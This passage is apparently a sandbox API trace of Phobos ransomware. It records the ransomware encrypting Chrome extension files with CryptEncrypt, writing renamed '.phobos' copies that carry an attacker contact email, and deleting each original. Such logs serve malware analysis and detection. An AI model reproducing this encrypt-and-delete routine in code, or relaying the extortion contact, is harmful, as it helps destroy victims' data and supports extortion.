data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json")) returned 0x2020 [0161.101] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.101] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.101] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.102] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.102] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.102] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf9, lpOverlapped=0x0) returned 1 [0161.102] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0161.103] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0161.103] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.103] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.103] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0161.103] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.103] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0161.103] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.103] CloseHandle (hObject=0x134) returned 1 [0161.104] CloseHandle (hObject=0x17c) returned 1 [0161.104] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\zh_tw\\messages.json")) returned 1 [0161.104] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.105] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9862) returned 1 [0161.105] CloseHandle (hObject=0x17c) returned 1 [0161.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json")) returned 0x2020 [0161.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.105] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.105] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.189] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.189] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.189] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2686, lpOverlapped=0x0) returned 1 [0161.487] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2690, dwBufLen=0x2690 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2690) returned 1 [0161.488] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2690, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2690, lpOverlapped=0x0) returned 1 [0161.582] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.582] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.582] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0161.582] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.582] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0161.583] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.583] CloseHandle (hObject=0x17c) returned 1 [0161.583] CloseHandle (hObject=0x134) returned 1 [0161.583] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json")) returned 1 [0161.584] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.585] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=43164) returned 1 [0161.585] CloseHandle (hObject=0x134) returned 1 [0161.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js")) returned 0x2020 [0161.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.585] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.585] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.586] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.586] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.586] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xa89c, lpOverlapped=0x0) returned 1 [0161.607] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa8a0, dwBufLen=0xa8a0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xa8a0) returned 1 [0161.608] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xa8a0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xa8a0, lpOverlapped=0x0) returned 1 [0161.609] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0161.609] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.609] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0161.609] CryptDestroyKey (hKey=0xa32da8) returned 1 [0161.609] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0161.609] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.609] CloseHandle (hObject=0x134) returned 1 [0161.610] CloseHandle (hObject=0x17c) returned 1 [0161.610] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\background_script.js")) returned 1 [0161.611] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.611] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=98730) returned 1 [0161.611] CloseHandle (hObject=0x17c) returned 1 [0161.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js")) returned 0x2020 [0161.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.611] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.611] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.612] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.612] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0161.612] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.612] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x181aa, lpOverlapped=0x0) returned 1 [0161.883] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x181b0, dwBufLen=0x181b0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x181b0) returned 1 [0161.884] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x181b0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x181b0, lpOverlapped=0x0) returned 1 [0161.886] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0161.886] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0161.886] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0161.886] CryptDestroyKey (hKey=0xa32d28) returned 1 [0161.886] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0161.886] CryptDestroyKey (hKey=0xa327e8) returned 1 [0161.886] CloseHandle (hObject=0x17c) returned 1 [0161.886] CloseHandle (hObject=0x134) returned 1 [0161.886] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_game_sender.js")) returned 1 [0161.887] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0161.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.888] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=238168) returned 1 [0161.888] CloseHandle (hObject=0x134) returned 1 [0161.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js")) returned 0x2020 [0161.888] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0161.888] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.888] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_route_details.js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 